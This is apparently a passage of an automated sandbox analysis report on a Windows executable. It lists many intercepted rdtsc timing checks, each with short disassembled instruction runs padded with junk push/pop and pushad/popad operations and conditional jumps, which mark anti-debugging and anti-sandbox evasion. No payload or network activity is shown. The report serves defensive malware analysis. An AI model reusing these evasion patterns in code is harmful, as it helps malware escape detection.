          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 379A50 second address: 379A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 378910 second address: 37891A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F65B529F4B6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37891A second address: 37891E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37891E second address: 378924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 378D30 second address: 378D49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BD5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 378509 second address: 37851C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4BEh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37F0D7 second address: 37F0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F65B4EE8BC6h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3887A0 second address: 3887B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jp 00007F65B529F4B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3887B3 second address: 3887BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38758E second address: 38759A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F65B529F4B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38759A second address: 3875A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38772B second address: 387740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F65B529F4B6h 0x0000000f jng 00007F65B529F4B6h 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 387740 second address: 387744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3350AF second address: 3350B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3350B3 second address: 3350B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3350B9 second address: 3350BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3350BE second address: 33510B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65B4EE8BCEh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D1E19h], esi 0x00000015 pushad 0x00000016 sub esi, dword ptr [ebp+122D3CA0h] 0x0000001c pushad 0x0000001d mov edi, dword ptr [ebp+122D3A5Ch] 0x00000023 or dword ptr [ebp+122D1D53h], ecx 0x00000029 popad 0x0000002a popad 0x0000002b mov ebx, dword ptr [ebp+12479236h] 0x00000031 mov ecx, 126033BBh 0x00000036 add eax, ebx 0x00000038 mov ecx, dword ptr [ebp+122D3519h] 0x0000003e nop 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 push edx 0x00000043 pop edx 0x00000044 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33510B second address: 33510F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38B705 second address: 38B70F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F65B4EE8BC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38B70F second address: 38B71C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38B71C second address: 38B722 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38B722 second address: 38B728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38B870 second address: 38B888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jns 00007F65B4EE8BCCh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38B888 second address: 38B8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F65B529F4BBh 0x0000000c pushad 0x0000000d je 00007F65B529F4B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38BB43 second address: 38BB47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38BB47 second address: 38BB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38BB53 second address: 38BB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38BB57 second address: 38BB67 instructions: 0x00000000 rdtsc 0x00000002 js 00007F65B529F4B6h 0x00000008 jo 00007F65B529F4B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38BB67 second address: 38BB83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65B4EE8BD8h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 394166 second address: 394170 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65B529F4BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 394170 second address: 394177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 394177 second address: 394189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F65B529F4B6h 0x0000000a js 00007F65B529F4B6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3922C9 second address: 3922CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3922CF second address: 3922DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3927B2 second address: 3927EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F65B4EE8BCEh 0x00000011 popad 0x00000012 push edx 0x00000013 jmp 00007F65B4EE8BD1h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 392A56 second address: 392A60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F65B529F4B6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 392A60 second address: 392A79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BD5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 393648 second address: 39364C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 393BD7 second address: 393BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F65B4EE8BD9h 0x0000000d pop edi 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 393E6B second address: 393E83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4C1h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 393E83 second address: 393E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39946A second address: 399470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39D1A3 second address: 39D1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39D1A9 second address: 39D1B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39C49F second address: 39C4A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39C4A3 second address: 39C4A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39C4A9 second address: 39C4AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CA45 second address: 39CA4B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CA4B second address: 39CA74 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F65B4EE8BCEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F65B4EE8BD2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CA74 second address: 39CA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CA78 second address: 39CA7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CE77 second address: 39CE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CE7B second address: 39CE7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CE7F second address: 39CE97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65B529F4C2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CE97 second address: 39CED5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F65B4EE8BC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F65B4EE8BD8h 0x00000013 jmp 00007F65B4EE8BD6h 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CED5 second address: 39CED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39CED9 second address: 39CEDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FCBF0 second address: 2FCC20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F65B529F4C6h 0x00000013 popad 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4491 second address: 3A4496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4949 second address: 3A494D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A494D second address: 3A4976 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F65B4EE8BCCh 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4976 second address: 3A4990 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jc 00007F65B529F4B6h 0x00000010 jne 00007F65B529F4B6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4B24 second address: 3A4B29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4E21 second address: 3A4E41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F65B529F4C0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F65B529F4B6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4E41 second address: 3A4E47 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4E47 second address: 3A4E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F65B529F4C2h 0x0000000c popad 0x0000000d push edi 0x0000000e pushad 0x0000000f jmp 00007F65B529F4BFh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4F7F second address: 3A4F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A88F8 second address: 3A88FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A88FC second address: 3A8902 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A8902 second address: 3A890C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A890C second address: 3A8916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F65B4EE8BC6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A8916 second address: 3A891C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A87CC second address: 3A87DB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F65B4EE8BC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A9F3B second address: 3A9F45 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65B529F4B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A9F45 second address: 3A9F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F65B4EE8BCBh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BA84E second address: 3BA863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jne 00007F65B529F4BEh 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BA518 second address: 3BA54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65B4EE8BD7h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F65B4EE8BD3h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BA54B second address: 3BA54F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BA54F second address: 3BA560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007F65B4EE8BC6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BA560 second address: 3BA56B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BA56B second address: 3BA571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BA571 second address: 3BA57E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BA57E second address: 3BA58D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BCAh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C0155 second address: 3C017D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jns 00007F65B529F4B6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F65B529F4C0h 0x0000001c popad 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C017D second address: 3C0195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007F65B4EE8BCDh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C0195 second address: 3C019B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BFB92 second address: 3BFBA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BCCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BFBA2 second address: 3BFBA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BFBA8 second address: 3BFBAD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BFD0A second address: 3BFD0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BFD0E second address: 3BFD20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BCEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BFD20 second address: 3BFD2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C566C second address: 3C5676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F65B4EE8BC6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C5676 second address: 3C56A3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F65B529F4C8h 0x0000000f jmp 00007F65B529F4BBh 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C915A second address: 3C9176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop ebx 0x0000000f jmp 00007F65B4EE8BCDh 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CB3D2 second address: 3CB3EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F65B529F4B6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F65B529F4BDh 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE44F second address: 3CE461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F65B4EE8BCEh 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF8D1 second address: 3CF8D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF8D7 second address: 3CF8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF8DD second address: 3CF8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jp 00007F65B529F4BCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
